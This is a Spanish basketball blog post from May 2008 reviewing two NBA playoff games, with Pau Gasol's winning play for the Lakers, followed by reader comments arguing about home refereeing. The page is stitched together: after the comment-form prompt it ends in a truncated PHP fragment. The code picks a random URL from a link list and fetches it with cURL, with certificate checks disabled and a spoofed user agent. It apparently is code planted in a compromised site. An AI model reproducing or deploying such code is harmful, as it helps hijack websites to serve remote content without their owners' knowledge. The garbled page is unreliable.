Defensa en L.A

15 de May de 2008 por TheDeerHunter

Defensa en L.A. (UTA 104 – LAL 111)

Todos los focos sobre Kobe y su maltrecha espalda anoche. Todas las esperanzas de Lakers y de Utah puestas en esa concreta zona de su cuerpo. La respuesta de Kobe: “Estoy preparado”; la respuesta de sus compañeros: “Si Kobe nos necesita estaremos preparados”… (Respuesta de Phil: “A mi edad vais a venir molestándome con esas menudencias”). El partido tenso, dificilísimo, igualado… Intercambio de golpes entre dos equipos que ya han demostrado sus credenciales a potencias del baloncesto, partida de ajedrez entre dos genios de la estrategia. Los rostros de máxima atención y concentración contagian al espectador. Si fallan defienden a muerte, si les anotan devuelven la canasta como si la vida les fuera en ello. El espectáculo es digno de una finalísima.

Es un partido para los grandes y muy mal tendría que haber estado la espalda para que no hubiera participado. Estos tipos son de otra materia: La fiebre, las lumbalgias, los dedos rotos sólo detienen a los mortales. Curiosamente la lesión no hace otra cosa que mejorar la calidad de sus aportaciones, economizándolas al máximo. Cada tiro, una canasta. Cada salto un rebote. Cada movimiento, una solución. Letal como la mamba negra. Eso sí, anoche Kobe no hubiera podido de ninguna manera cargar con todo el peso del equipo. Lo hicieron otros con eficacia. Gasol, Odom, Fisher, Radmanovic… Todo el equipo aglutinado, agresivo, focalizado, comprometido al máximo como hacía tiempo no se había visto en el Staples. Y la defensa… ¡qué defensa!! Porque anoche no era como otras. No era “Somos muy buenos y ganamos con la gorra”. No era “Balones a Kobe”. No era “That’s Hollywood y qué buena está la rubia de la segunda fila”. Anoche era “¿Tenemos lo que hay que tener para ganar este partido?”

Y así se llegó al último minuto. Igualados. Jugándose la vida en cada acción. Deron Williams sensacional, como siempre. Okur, Boozer apretando dentro, muy físicos. Kirilenko tomando responsabilidades y Brewer con acierto. Un 5 contra 5 que quedará en la retina de los aficionados. Y Gasol lo logró. Asumió la responsabilidad y acertó en sus acciones en el momento clave. Su mano ganó el partido, su cuerpo fue el equipo. La primera vez como Laker que fue él y no otro quien lograba la canasta de la victoria con lo mucho que se le exige reivindicarse. De su rostro emocionado podemos sentirnos orgullosos, una vez más.

La mutación del Big Three (CLE 89 – BOS 96)

Si Boston no pierde en casa ninguno de los partidos que le quedan serán CAMPEONES. Se pueden permitir el hacer un baloncesto de medio pelo fuera mientras en el Garden sigan metamorfoseándose en invencibles. Ese es el hecho. Nadie puede ser invencible eternamente pero en este caso quedan como mucho 9 partidos más allí. Esto también es un hecho. Lo opinable es que como sigan jugando con fuego en algún momento se van a quemar.

Lo del Big Three hace tiempo que ha dejado de ser tal porque Ray Allen ha desaparecido. No se sabe muy bien porqué, si por el físico de un jugador tan veterano que nunca ha sido una roca, si por el desgaste, por el cansancio o por su rol en el equipo. Los otros dos miembros, en cambio, no están jugando mal. Garnett es el más regular pero esta temporada se ha acostumbrado a una reducción de sus aportaciones y le cuesta absorver juego. Pierce está muy bien en Boston, tanto en ataque como en defensa, pero fuera es otra historia. Del resto del equipo no hay garantías más allá del esfuerzo en defensa. Rondo está irregular y los refuerzos no han dado lo esperado. Después de Garnett y Pierce… no hay nada.

Anoche tocó cara. El “Big Three Minus 1” estuvo sensacional y a ellos se unió puntualmente Rondo en un grandísimo partido. El resto a defender y a mirar como los primeros juegan. Pero en el barrio de enfrente peor aún. Volvió Lebrón, el de siempre, el de “soy casi dios pero sin el casi”, el de “aunque me defiendan 5 voy a colgarme del aro como un animal”. Pero es que todavía no se ha percatado de que es tan sumamente grande que a su sombra no llega a crecer nada. Cuanto mejor juega él, menos juega su equipo. Nos parece improvable que vuelva a repetir el milagro del año pasado él sólo.

Ahora vuelven a Cleveland. Ya no estamos seguros si volverá a tener lugar “El extraño caso del Doctor Jekyll y Mr Hyde” con Boston, con otra eliminatoria a 7, a jugársela otra vez a cara o cruz en el Garden, con los estandártes y las camisetas colgadas. Si ganan 9 seguidos en casa serán CAMPEONES. No sabemos qué pensarán de esto sus aficionados.

Comenta

10 comentarios a esta entrada

  1. Red dice:
    #1

    Cito:

    (…)

    7:40CET.- RITOS DE INICIACION.-

    Decia hace un rato que estos partidos separan a los niños de los hombres. Tras su segundo rebote ofensivo y mate, la cara de Gasol reflejaba una emoción que es la sublimación del deporte. Habia atravesado el umbral que separa la adolescencia de la edad adulta. En Madrid, con Kirilenko enfrente, fue un adolescente. En Los Angeles, con Kirilenko enfrente, se ha puesto de pie para ser contado en el ambito del liderazgo. Y su cara reflejaba esa consciencia. El partido era de Deron, pero se lo ha dejado arrebatar. Gasol,Odom.Kobe, ahn forjado hoy un vinculo que conducirá a este equipo más lejos en el playoff. Ahora se irán a cenar y se mirarán de otra manera, porque saben lo que es regresar juntos del infierno.

    Hoy ha sido un gran dia para el baloncesto español. Hemos llegado al campamento base en la conquista del Everest del respeto y la credibilidad.

    Que grande que es Trecet!! Casi lloro!

    http://www.marca.com/blogs/deportespuntocom

      Citar

  2. Gallis dice:
    #2

    Joder, si que es bonito lo de Trecet, si…

    No tengo mucho tiempo, pero solo quería apuntar que si Papa Noel o los Reyes Magos existen, yo les pido un arbitraje fuera de casa así para el próximo viernes, jojojojo…

    Tremendo Pau, tremendo…

      Citar

  3. MagicJohnson32 dice:
    #3

    El partido fue como dice Deer pero añadiendo un altísimo grado de ANGUSTIA, jaja. En serio, qué manera de sufrir. No hubo manera de despegarse de ellos, pero en ningún momento se pusieron por delante. Qué grande es Deron y qué bien estuvieron Odom y Pau cuando tocaba. Muy bien Kobe, muy centrado y consciente de sus posibilidades.

    Lo normal sería un 7º pero espero matar la serie en SLC.

      Citar

  4. Viva_Dirk dice:
    #4

    Grandeeeeeeeeeeeeeee ese Pau!!!!!!!!! Partidazo en general la verdad, ojalá sentenciemos en el 6º.

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Gran partido. Sí señor, por los que merece la pena levantarse a las 5 e ir de culo todo el día. Grandes Odom y GAsol y Deron. Los demás bien. UN cierto caseritismo, no??

    A Trecet se le debe rendir pleitesía musical y poco más. Es un peligro.

      Citar

  6. TheDeerHunter dice:
    #6

    Yo he ido sonriente todo el día….

    En parte estoy de acuerdo con lo del arbitraje caserillo. Lo estoy porque ha habido alguna que otra falta que no ha sido y la han pitado a favor de L.A.
    Ni de coña la que ha dado la victoria, que Okur trata de ser muy listo y hoy ha sido demasiado, pero las imágenes han sido claras de lo que ha tratado de hacer.
    En cambio yo sí he visto un codazo en todos los morros de Gasol, más claro que el agua y que casualmente nadie ha visto nada. En mi opinión, al menos al mitad de veces que Utah carga el rebote hace falta y más de la mitad de ellas no es sancionada.

    En definitiva, el arbitraje casero cierto. Pero ya les hubiera gustado a Lakers recibir este tipo de arbitrajes caseros en Salt Lake, porque aquello sí que no ha tenido nombre.

      Citar

  7. Gallis dice:
    #7

    Exacto. El arbitraje fue casero, como lo están siendo en todos los partidos de todas las eliminatorias (aunque solo se saque el tema cuando los Lakers juegan en el Staples)…

    Pero una cosa es un arbitraje casero y otra cosa es la barra libre que los Jazz tienen en Utah. Lo dicho, ójala en el sexto los arbitros sean tan caseros como en el quinto. Con eso me basta y me sobra…

      Citar

  8. aro_pasado_no_newtoniano dice:
    #8

    Los dos últimos comentarios son de fans de los lakers, y el antepenultimo no. ¿casualidad?

    Bavetta dimisión¡¡

      Citar

  9. TheDeerHunter dice:
    #9

    ¿dudas de nuestra objetividad??

    juasss

      Citar

  10. aro_pasado_no_newtoniano dice:
    #10

    ¿nuestra o vuestra?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>